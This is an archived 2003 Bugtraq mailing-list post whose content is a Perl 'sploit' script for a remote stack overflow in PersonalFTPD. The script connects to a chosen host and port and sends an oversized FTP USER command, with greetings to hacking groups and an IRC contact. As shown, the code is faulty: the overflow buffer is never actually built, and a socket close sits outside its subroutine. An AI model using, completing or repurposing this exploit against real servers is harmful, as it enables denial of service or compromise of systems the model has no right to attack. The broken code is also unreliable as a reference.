Remote Stack Overflow exploit for Personal FTPD

From: subj (r2subj3ct_at_dwclan.org)
Date: 05/08/03

  • Next message: Dan Carter: "Re: [VulnWatch] Hotmail & Passport (.NET Accounts) Vulnerability"
    Date: 8 May 2003 08:11:23 -0000
    To: bugtraq@securityfocus.com
    
    
    ('binary' encoding is not supported, stored as-is)

    #!/usr/bin/perl
    use IO::Socket;

    ##########################################################
    # #
    # Remote Stack Overflow sploit for PersonalFTPD #
    # If wanna talk with me find me on irc #
    # irc.irochka.net #dwc, #global, #phreack #
    # ###################################################### #
    # thanx to kabuto, drG4njubas, fnq #
    # gr33tz to dhg, gipshack, rsteam, blacktigerz #
    # D4rkGr3y, r4ShRaY, DethSpirit, J0k3r, Foster, nik0 #
    # ORB, Moby, 3APA3A, euronymous, L0vCh1Y, d1z #
    # ###################################################### #
    # Vulnerability links: #
    # http://security.nnov.ru/search/document.asp?docid=4309 #
    # http://www.securityfocus.com/archive/1/316958 #
    # #
    ##########################################################

    $data = "A";

    print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n";
    print "[..] Remote Stack Overflow sploit for PersonalFTPD [..]\n";
    print "[..] by subj | dwc :: big 10x to Kabuto [..]\n";
    print "[..] www.dwcgr0up.com www.dwcgr0up.com/subj/ [..]\n";
    print "[..] ::::::::::::::::::::::::::::::::::::::::::::: [..]\n\n";

    $count_param=@ARGV;
    $n="0";
    if ($count_param==0) {print "Usage: -h - host, -p - port, -b - buffer
    size\n\n"; exit; }
    while ($n<$count_param) {
    if ($ARGV[$n] eq "-h") {$server=$ARGV[$n+1];}
    if ($ARGV[$n] eq "-p") {$port=$ARGV[$n+1];}
    if ($ARGV[$n] eq "-b") {$buf=$ARGV[$n+1];}
    $n++;
    }
    &connect;

    sub connect
    {
    $sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort => "$port",
    Proto => "tcp")
            || die "Can\'t connect to $server port $port\n";
    print $sock "USER $buffer\n";
    print "Buffer has beens sended...";

    }

    close($sock);
    exit;


  • Next message: Dan Carter: "Re: [VulnWatch] Hotmail & Passport (.NET Accounts) Vulnerability"

    Relevant Pages

    • Re: ApplyFilter method of DoCmd object in OnOpen event property qu
      ... > Notice that the Open event in this line of code has a Cancel argument. ... > This means if we ever want to cancel the form from opening for some ... >> Exit Sub ... we naturally have to have a proper exit area for the code. ...
      (microsoft.public.access.formscoding)
    • Re: GOTO statement and return results way
      ... Now that's just getting picky for the sake of getting picky. ... to Exit Try would add unecessary complexity, because one would have to add Return ... ... sub method ... >> If Fail Then Exit Do ...
      (microsoft.public.dotnet.languages.vb)
    • Re: Record Validation Strategy
      ... Private Sub cmdExit_Click ... I would like to provide an exit button, ... I could Cancel, but I get an unwanted "Close Action cancelled" message. ... Dim intResponse As Integer ...
      (microsoft.public.access.forms)
    • the code for bbs 3
      ... elsif ... sub printreply ... param and param and param eq param ...
      (comp.lang.perl.misc)
    • Re: Error handling code placement
      ... Your placement of the error handler is fine. ... the normal exit point of the function and before the end of the function. ... Function (or Sub) FunctionName ...
      (microsoft.public.access.formscoding)